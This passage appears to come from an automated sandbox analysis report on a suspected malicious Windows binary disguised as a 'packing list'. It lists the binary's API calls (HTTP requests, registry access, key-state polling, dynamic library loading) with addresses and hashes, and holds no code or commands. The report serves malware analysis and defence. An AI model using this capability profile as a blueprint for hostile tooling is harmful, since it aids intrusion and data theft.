                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00B6B88E
                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00B6B8A1
                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 00B6B8D1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 3850602802-1403004172
                                                  • Opcode ID: d87bdfb86c2759badfc2d91dc61382a659c139f3c1f45037888169af226d2c0e
                                                  • Instruction ID: 05715a599dd7b0c8671dea38a4f1cb6d31a90a67a428b68f6774fc02fc67088e
                                                  • Opcode Fuzzy Hash: d87bdfb86c2759badfc2d91dc61382a659c139f3c1f45037888169af226d2c0e
                                                  • Instruction Fuzzy Hash: 3321F372A00108BFDB04ABA4C886DFE77FCDF15350F2042A9F426A31E0DB785E469B60
                                                  APIs
                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B84401
                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B84427
                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B84457
                                                  • InternetCloseHandle.WININET(00000000), ref: 00B8449E
                                                    • Part of subcall function 00B85052: GetLastError.KERNEL32(?,?,00B843CC,00000000,00000000,00000001), ref: 00B85067
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                  • String ID:
                                                  • API String ID: 1951874230-3916222277
                                                  • Opcode ID: aba97b801ba4c9f9262bc587a2f2db76c9c456f656a70c011b09415bd02d8123
                                                  • Instruction ID: af2d5df4978735a8984d445749bd55d7a57e3e3fc9b2fcf3b4af4c5b2263077d
                                                  • Opcode Fuzzy Hash: aba97b801ba4c9f9262bc587a2f2db76c9c456f656a70c011b09415bd02d8123
                                                  • Instruction Fuzzy Hash: 27217CB2600209BFE711AB558C85FBBBAECEB48748F14855AF509A2260EF648D059771
                                                  APIs
                                                    • Part of subcall function 00B4D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B4D1BA
                                                    • Part of subcall function 00B4D17C: GetStockObject.GDI32(00000011), ref: 00B4D1CE
                                                    • Part of subcall function 00B4D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B4D1D8
                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00B9915C
                                                  • LoadLibraryW.KERNEL32(?), ref: 00B99163
                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00B99178
                                                  • DestroyWindow.USER32(?), ref: 00B99180
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                  • String ID: SysAnimate32
                                                  • API String ID: 4146253029-1011021900
                                                  • Opcode ID: 14056dc3ce0f336b9cedf029a9cfb274590d66cba7af58c2213a14c103f7c490
                                                  • Instruction ID: d1d84549463893b32b6cfd115daee4f6b9120e5b8675265c6eb2929fc7b9a15b
                                                  • Opcode Fuzzy Hash: 14056dc3ce0f336b9cedf029a9cfb274590d66cba7af58c2213a14c103f7c490
                                                  • Instruction Fuzzy Hash: FC21BB71200216BBEF604F698C89EBA37E9FF99364F1006ACF910A3190D772CC51A760
                                                  APIs
                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00B79588
                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B795B9
                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00B795CB
                                                  • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00B79605
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: CreateHandle$FilePipe
                                                  • String ID: nul
                                                  • API String ID: 4209266947-2873401336
                                                  • Opcode ID: d8a837ee16b42204d49ff305531f3b8c65facfc089e262a8e06d4ced92bbe8aa
                                                  • Instruction ID: b4397ebb7fcbdc763ed97afe9856d6ac1878d7f6587a19ec2f5be7a54effc19f
                                                  • Opcode Fuzzy Hash: d8a837ee16b42204d49ff305531f3b8c65facfc089e262a8e06d4ced92bbe8aa
                                                  • Instruction Fuzzy Hash: 0F216270500316ABDB219F25DC45A9A7BF4FF55724F208A59F9B9E72D0D770D940CB10
                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00B79653
                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B79683
                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00B79694
                                                  • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00B796CE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: CreateHandle$FilePipe
                                                  • String ID: nul
                                                  • API String ID: 4209266947-2873401336
                                                  • Opcode ID: 4c8f5dac3b19b572215df691c3ae00432fd7de05d56548c812a1896f6ee409bb
                                                  • Instruction ID: 29cf417198dc28ad2e07872bae77573fc89251b6c9ad66a2eaee157e462732f8
                                                  • Opcode Fuzzy Hash: 4c8f5dac3b19b572215df691c3ae00432fd7de05d56548c812a1896f6ee409bb
                                                  • Instruction Fuzzy Hash: F22180716002069BDB209F69DC45E9A77E8EF45734F208B99F8B5E72D0EBB0D941CB50
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00B7DB0A
                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00B7DB5E
                                                  • __swprintf.LIBCMT ref: 00B7DB77
                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000,00BCDC00), ref: 00B7DBB5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                  • String ID: %lu
                                                  • API String ID: 3164766367-685833217
                                                  • Opcode ID: 2eba15a727c77dcae06b4775e04a24a1f73cdd9527fb4296f8f8062cc29cf424
                                                  • Instruction ID: 5ae24ae63b016b716073b6fe62f54503a4e394a73aafd3e6596b2f1761240da5
                                                  • Opcode Fuzzy Hash: 2eba15a727c77dcae06b4775e04a24a1f73cdd9527fb4296f8f8062cc29cf424
                                                  • Instruction Fuzzy Hash: 25218335600109AFCB10EFA8C985EAEBBF8EF48704F1040A9F909E7351DB74EA45CB60
                                                  APIs
                                                    • Part of subcall function 00B6C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00B6C84A
                                                    • Part of subcall function 00B6C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B6C85D
                                                    • Part of subcall function 00B6C82D: GetCurrentThreadId.KERNEL32 ref: 00B6C864
                                                    • Part of subcall function 00B6C82D: AttachThreadInput.USER32(00000000), ref: 00B6C86B
                                                  • GetFocus.USER32 ref: 00B6CA05
                                                    • Part of subcall function 00B6C876: GetParent.USER32(?), ref: 00B6C884
                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00B6CA4E
                                                  • EnumChildWindows.USER32(?,00B6CAC4), ref: 00B6CA76
                                                  • __swprintf.LIBCMT ref: 00B6CA90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                  • String ID: %s%d
                                                  • API String ID: 3187004680-1110647743
                                                  • Opcode ID: c02312d40f24c9963e3583e6467e82ed63d18dae9d1d90d07aebaa062e6ce88a
                                                  • Instruction ID: f66d6da4c7cefe008e99f3d4e4c9ba8c0571f04774fe71c9b4382c71e44fb096
                                                  • Opcode Fuzzy Hash: c02312d40f24c9963e3583e6467e82ed63d18dae9d1d90d07aebaa062e6ce88a
                                                  • Instruction Fuzzy Hash: 7A117F756002097BCB11BFA48C85FBA3BA8AF44714F0080E6FE49AB186DB789945DB70
                                                  APIs
                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00B919F3
                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00B91A26
                                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00B91B49
                                                  • CloseHandle.KERNEL32(?), ref: 00B91BBF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                  • String ID:
                                                  • API String ID: 2364364464-0
                                                  • Opcode ID: 6a61e178e69d8747cf81ab852581de16ee1e1e7cd83d7f124446e61ba6e9ee35
                                                  • Instruction ID: f786faf1252234ed5ad50958e991c41be1a3d335dfbc78c74bcb720ce1117284
                                                  • Opcode Fuzzy Hash: 6a61e178e69d8747cf81ab852581de16ee1e1e7cd83d7f124446e61ba6e9ee35
                                                  • Instruction Fuzzy Hash: EE817370A00205ABDF11DF68C886BADBBF5EF04720F148899F905AF382D7B5E941DB91
                                                  APIs
                                                  • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00B9E1D5
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00B9E20D
                                                  • IsDlgButtonChecked.USER32(?,00000001), ref: 00B9E248
                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00B9E269
                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00B9E281
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$ButtonCheckedLongWindow
                                                  • String ID:
                                                  • API String ID: 3188977179-0
                                                  • Opcode ID: 7f820174593897fce16f3cfe4b5015006601a7012926cc41e1b3738d5ea305d4
                                                  • Instruction ID: 8ef8fed18a5c5235c3bd61d64a92c723cf4799facd876c6446102a9fd607b93e
                                                  • Opcode Fuzzy Hash: 7f820174593897fce16f3cfe4b5015006601a7012926cc41e1b3738d5ea305d4
                                                  • Instruction Fuzzy Hash: 25618F35A00214AFDF21CF68C895FAA77FAEF49300F1444E9F969A72A1C770E940CB10
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 00B71CB4
                                                  • VariantClear.OLEAUT32(00000013), ref: 00B71D26
                                                  • VariantClear.OLEAUT32(00000000), ref: 00B71D81
                                                  • VariantClear.OLEAUT32(?), ref: 00B71DF8
                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00B71E26
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Variant$Clear$ChangeInitType
                                                  • String ID:
                                                  • API String ID: 4136290138-0
                                                  • Opcode ID: 22dfa3fbcc5fb6cd6b3187bf6b7bfd9d1fa4cadd9fb3b5f4d17ced5695d8a4b7
                                                  • Instruction ID: 595e6d03ce66589f5f90496a08d8c4833069ef2eca8c19d3786a68cb476de463
                                                  • Opcode Fuzzy Hash: 22dfa3fbcc5fb6cd6b3187bf6b7bfd9d1fa4cadd9fb3b5f4d17ced5695d8a4b7
                                                  • Instruction Fuzzy Hash: DD5129B5A00209AFDB14CF5CC884AAAB7F8FF4C314B158569E959DB301E734EA51CFA0
                                                  APIs
                                                    • Part of subcall function 00B3936C: __swprintf.LIBCMT ref: 00B393AB
                                                    • Part of subcall function 00B3936C: __itow.LIBCMT ref: 00B393DF
                                                  • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00B906EE
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00B9077D
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00B9079B
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00B907E1
                                                  • FreeLibrary.KERNEL32(00000000,00000004), ref: 00B907FB
                                                    • Part of subcall function 00B4E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00B7A574,?,?,00000000,00000008), ref: 00B4E675
                                                    • Part of subcall function 00B4E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00B7A574,?,?,00000000,00000008), ref: 00B4E699
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 327935632-0
                                                  • Opcode ID: 58811222f22811b737482c0de9f39ecbcd38651a03ec3dfd45992afee89ffae0
                                                  • Instruction ID: af7aee5d55a43d4d29a613688c9e02e42807d52d459a867190c371ad6eebe9a5
                                                  • Opcode Fuzzy Hash: 58811222f22811b737482c0de9f39ecbcd38651a03ec3dfd45992afee89ffae0
                                                  • Instruction Fuzzy Hash: BD510775A00209DFCF00EFA8D8819ADB7F5BF59310F1580A9E915AB352DB74ED45CB90
                                                  APIs
                                                    • Part of subcall function 00B93C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B92BB5,?,?), ref: 00B93C1D
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B92EEF
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B92F2E
                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00B92F75
                                                  • RegCloseKey.ADVAPI32(?,?), ref: 00B92FA1
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00B92FAE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                  • String ID:
                                                  • API String ID: 3740051246-0
                                                  • Opcode ID: 3c2b4cb9b91430404d51e3683c9b669557ad095ea80c8cc6152c595377bdaf37
                                                  • Instruction ID: c0c3837dbf5d0ca0f3ff705111fae749bd9307323a1d9e153f34955a3d323d95
                                                  • Opcode Fuzzy Hash: 3c2b4cb9b91430404d51e3683c9b669557ad095ea80c8cc6152c595377bdaf37
                                                  • Instruction Fuzzy Hash: C6515C71608204AFDB04EF64C891F6ABBF9FF88304F5089ADF59597291EB70E905CB52
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9e4d3c7c04ab4c1c7c210319f65c58d02e532c11c72c87e6da926ce41eac5e9c
                                                  • Instruction ID: a955c9730ab1e22a93c98a5ed509c4c21d3b6d8c890fcb6f5502cae44b2b91de
                                                  • Opcode Fuzzy Hash: 9e4d3c7c04ab4c1c7c210319f65c58d02e532c11c72c87e6da926ce41eac5e9c
                                                  • Instruction Fuzzy Hash: 9941A379900504ABCF10DF68CC84FA9BFE8EF09310F1506B5E95AA72E1DB74AD01DA50
                                                  APIs
                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00B812B4
                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00B812DD
                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00B8131C
                                                    • Part of subcall function 00B3936C: __swprintf.LIBCMT ref: 00B393AB
                                                    • Part of subcall function 00B3936C: __itow.LIBCMT ref: 00B393DF
                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00B81341
                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00B81349
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 1389676194-0
                                                  • Opcode ID: 5a63fb97034df697a7312939be5d9a9387a4143fb86fb5cb3f8cdaa30f0338e8
                                                  • Instruction ID: 307e524d44c3c775e73c3aa384bb1d2d2c0000f1d8941fad4a03f61ecefb3d8b
                                                  • Opcode Fuzzy Hash: 5a63fb97034df697a7312939be5d9a9387a4143fb86fb5cb3f8cdaa30f0338e8
                                                  • Instruction Fuzzy Hash: 2C410A75A00105EFCB01EF64C9819AEBBF9FF08310F148099E90AAB362DB71ED01DB55
                                                  APIs
                                                  • GetCursorPos.USER32(000000FF), ref: 00B4B64F
                                                  • ScreenToClient.USER32(00000000,000000FF), ref: 00B4B66C
                                                  • GetAsyncKeyState.USER32(00000001), ref: 00B4B691
                                                  • GetAsyncKeyState.USER32(00000002), ref: 00B4B69F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: AsyncState$ClientCursorScreen
                                                  • String ID:
                                                  • API String ID: 4210589936-0
                                                  • Opcode ID: 4178e4824aba78fb87523e1c07f551b8c2212aa971ffbefb6617538947c14290
                                                  • Instruction ID: ba367e1e8046d72b6bbf3d32879a01c350e6eb830368b6e53ea43efc72fc3460
                                                  • Opcode Fuzzy Hash: 4178e4824aba78fb87523e1c07f551b8c2212aa971ffbefb6617538947c14290
                                                  • Instruction Fuzzy Hash: 2A415035508115BFDF159F64C844EE9FBF4FB06324F10439AF82A96290CB31AA54EF91
                                                  APIs
                                                  • GetWindowRect.USER32(?,?), ref: 00B6B369
                                                  • PostMessageW.USER32(?,00000201,00000001), ref: 00B6B413
                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00B6B41B
                                                  • PostMessageW.USER32(?,00000202,00000000), ref: 00B6B429
                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00B6B431
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
